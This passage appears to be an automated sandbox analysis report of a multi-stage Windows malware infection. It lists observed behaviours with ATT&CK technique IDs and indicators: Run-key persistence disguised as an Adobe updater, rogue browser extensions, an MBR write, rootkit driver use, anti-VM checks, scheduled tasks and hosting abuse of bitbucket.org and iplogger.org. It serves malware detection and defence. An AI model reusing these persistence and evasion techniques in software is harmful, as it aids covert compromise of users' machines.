Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_7f81c10e3da02ef22b6df12538f807f6 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_7f81c10e3da02ef22b6df12538f807f6\\AdobeUpdaterV131.exe"	2guyqrpGkKfND7jVGbND7CI2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_c2304190946cb37f941f9c4acb289e9f = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_c2304190946cb37f941f9c4acb289e9f\\AdobeUpdaterV131.exe"	2guyqrpGkKfND7jVGbND7CI2.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	edgfLjK.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	edgfLjK.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	edgfLjK.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
322	bitbucket.org
349	bitbucket.org
467	iplogger.org
468	iplogger.org
301	bitbucket.org
309	bitbucket.org

Looks up external IP address via web service 14 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
872	ipinfo.io
276	api.myip.com
282	ipinfo.io
548	ipinfo.io
601	ipinfo.io
4816	api.ipify.org
499	ipinfo.io
500	ipinfo.io
549	ipinfo.io
587	ipinfo.io
278	api.myip.com
870	ipinfo.io
871	ipinfo.io
281	ipinfo.io

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	zSq9_LNldKYh1CBz04gNfS_1.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x00080000000236d0-2513.dat	autoit_exe

Drops file in System32 directory 45 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661	edgfLjK.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	foUkoPZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D4579ED561AFE0AD26F688A8C9A41CC6	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	edgfLjK.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D	edgfLjK.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D4579ED561AFE0AD26F688A8C9A41CC6	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	foUkoPZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	edgfLjK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	edgfLjK.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs

pid	Process
5084	setup.exe
5844	OlRwiKX7EYNxfrbE5a92.exe
5052	explorha.exe
840	explorha.exe
3048	explorha.exe
2052	explorha.exe
3664	explorha.exe
2444	explorha.exe
4188	explorha.exe
4184	explorha.exe
2796	Myh89dg1k8SeHjUEE0Hq.exe
2784	a9p75xZmBYFqxiIiCYhm.exe
4748	explorha.exe

Suspicious use of SetThreadContext 11 IoCs

description	pid	Process	procid_target
PID 4552 set thread context of 5384	4552	4p8e02_zESQoARv4BD86syqL.exe	345
PID 5128 set thread context of 1304	5128	HYcK04fDpm59NE1iuqeohCe6.exe	274
PID 2712 set thread context of 2468	2712	Cm83ixjY2n3PECS3wKVi7ZuT.exe	324
PID 5892 set thread context of 5324	5892	_NHunBZSe8eifB7b8W9h.exe	280
PID 5672 set thread context of 4200	5672	dckuybanmlgp.exe	235
PID 5672 set thread context of 2416	5672	dckuybanmlgp.exe	240
PID 2496 set thread context of 2272	2496	fIQj5WEYwVW9koZrQrGg9EWZ.exe	248
PID 5592 set thread context of 1628	5592	zWVaRgE_VfJUi5dB8iqZVzds.exe	430
PID 4884 set thread context of 1068	4884	fqaEFn20tPKtGTDCoMLJ.exe	477
PID 1140 set thread context of 3048	1140	7hHumx0NIaQCH5Mt1mE9.exe	549
PID 868 set thread context of 2360	868	gEsNgzNQFG_H09rqJ_UR.exe	562

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	d83frV2Rj9Wa_Wazpbh4_p98.exe
File opened (read-only)	\??\VBoxMiniRdrDN	7KsMJEa7ziqWauV4kdgZCGKn.exe

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\PydvuLgnU\NvGONL.dll	edgfLjK.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	edgfLjK.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	edgfLjK.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	edgfLjK.exe
File created	C:\Program Files (x86)\QXtcPRSLZZJU2\JlUCXRl.xml	edgfLjK.exe
File created	C:\Program Files (x86)\hZHKEYKgZYhOxOmqCcR\GqmIhqK.xml	edgfLjK.exe
File created	C:\Program Files (x86)\VZsPcsXHqfUn\naGsMhQ.dll	edgfLjK.exe
File created	C:\Program Files (x86)\QXtcPRSLZZJU2\TNpvNGvOsNbLW.dll	edgfLjK.exe
File created	C:\Program Files (x86)\sEMTsjgPFAnxC\TBdqAgZ.dll	edgfLjK.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	edgfLjK.exe
File created	C:\Program Files (x86)\sEMTsjgPFAnxC\iulUzeX.xml	edgfLjK.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	edgfLjK.exe
File created	C:\Program Files (x86)\PydvuLgnU\BdZAKbR.xml	edgfLjK.exe
File created	C:\Program Files (x86)\hZHKEYKgZYhOxOmqCcR\ykflvWT.dll	edgfLjK.exe

Drops file in Windows directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	d83frV2Rj9Wa_Wazpbh4_p98.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\fKNHOVHjQSXmROVYc.job	schtasks.exe
File created	C:\Windows\Tasks\bunLmsPgGqMrVCMrEs.job	schtasks.exe
File created	C:\Windows\rss\csrss.exe	d83frV2Rj9Wa_Wazpbh4_p98.exe
File opened for modification	C:\Windows\rss	7KsMJEa7ziqWauV4kdgZCGKn.exe
File created	C:\Windows\rss\csrss.exe	7KsMJEa7ziqWauV4kdgZCGKn.exe
File created	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\EvyHZXkcfFClVsN.job	schtasks.exe
File created	C:\Windows\Tasks\VZQmWUwKKeNqOLWJD.job	schtasks.exe
File created	C:\Windows\Tasks\explorha.job	OlRwiKX7EYNxfrbE5a92.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4352	sc.exe
4976	sc.exe
5204	sc.exe
5844	sc.exe
2576	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 17 IoCs

pid	pid_target	Process	procid_target
5368	5672	WerFault.exe	129
5336	5672	WerFault.exe	129
5488	5672	WerFault.exe	129
4648	5672	WerFault.exe	129
5392	5672	WerFault.exe	129
5224	5672	WerFault.exe	129
5324	5672	WerFault.exe	129
5132	5672	WerFault.exe	129
752	5384	WerFault.exe	147
4724	5672	WerFault.exe	129
1628	1304	WerFault.exe	153
4116	5324	WerFault.exe	230
5140	3112	WerFault.exe	121
3608	5704	WerFault.exe	131
544	1068	WerFault.exe	477
3440	3048	WerFault.exe	549
552	2360	WerFault.exe	562

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cctbhgt
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	EL2Valb7nJ1aCGWwenVPdrf8.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	EL2Valb7nJ1aCGWwenVPdrf8.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	EL2Valb7nJ1aCGWwenVPdrf8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cctbhgt
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cctbhgt

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	j6ClvmutSN6hUixkjGMixepv.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MsBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MsBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	2guyqrpGkKfND7jVGbND7CI2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	_sMdS5SXAFvQf2QncmxDg1wN.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	j6ClvmutSN6hUixkjGMixepv.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	8wYfsbzIhhMlVg7PGNu8B15u.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	NIyTViq8eDXvz9CBundc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	8c6ea728e2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	_sMdS5SXAFvQf2QncmxDg1wN.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	8wYfsbzIhhMlVg7PGNu8B15u.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	2guyqrpGkKfND7jVGbND7CI2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	NIyTViq8eDXvz9CBundc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	8c6ea728e2.exe

Creates scheduled task(s) 1 TTPs 27 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
216	schtasks.exe
5256	schtasks.exe
1360	schtasks.exe
2124	schtasks.exe
4348	schtasks.exe
5020	schtasks.exe
5452	schtasks.exe
340	schtasks.exe
3684	schtasks.exe
2320	schtasks.exe
2364	schtasks.exe
5036	schtasks.exe
2648	schtasks.exe
4440	schtasks.exe
3472	schtasks.exe
5488	schtasks.exe
3928	schtasks.exe
5304	schtasks.exe
4536	schtasks.exe
4160	schtasks.exe
1600	schtasks.exe
5176	schtasks.exe
5784	schtasks.exe
5056	schtasks.exe
4460	schtasks.exe
1604	schtasks.exe
2748	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2192	timeout.exe

Enumerates system info in registry 2 TTPs 16 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

GoLang User-Agent 7 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	908	Go-http-client/1.1
HTTP User-Agent header	914	Go-http-client/1.1
HTTP User-Agent header	2594	Go-http-client/1.1
HTTP User-Agent header	2603	Go-http-client/1.1
HTTP User-Agent header	3992	Go-http-client/1.1
HTTP User-Agent header	3993	Go-http-client/1.1
HTTP User-Agent header	907	Go-http-client/1.1

Kills process with taskkill 1 IoCs

evasion

pid	Process
5304	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	d83frV2Rj9Wa_Wazpbh4_p98.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	d83frV2Rj9Wa_Wazpbh4_p98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	d83frV2Rj9Wa_Wazpbh4_p98.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2892 = "Sudan Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	d83frV2Rj9Wa_Wazpbh4_p98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	d83frV2Rj9Wa_Wazpbh4_p98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	d83frV2Rj9Wa_Wazpbh4_p98.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2631 = "Norfolk Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	d83frV2Rj9Wa_Wazpbh4_p98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	d83frV2Rj9Wa_Wazpbh4_p98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	d83frV2Rj9Wa_Wazpbh4_p98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	d83frV2Rj9Wa_Wazpbh4_p98.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-492 = "India Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	d83frV2Rj9Wa_Wazpbh4_p98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	d83frV2Rj9Wa_Wazpbh4_p98.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
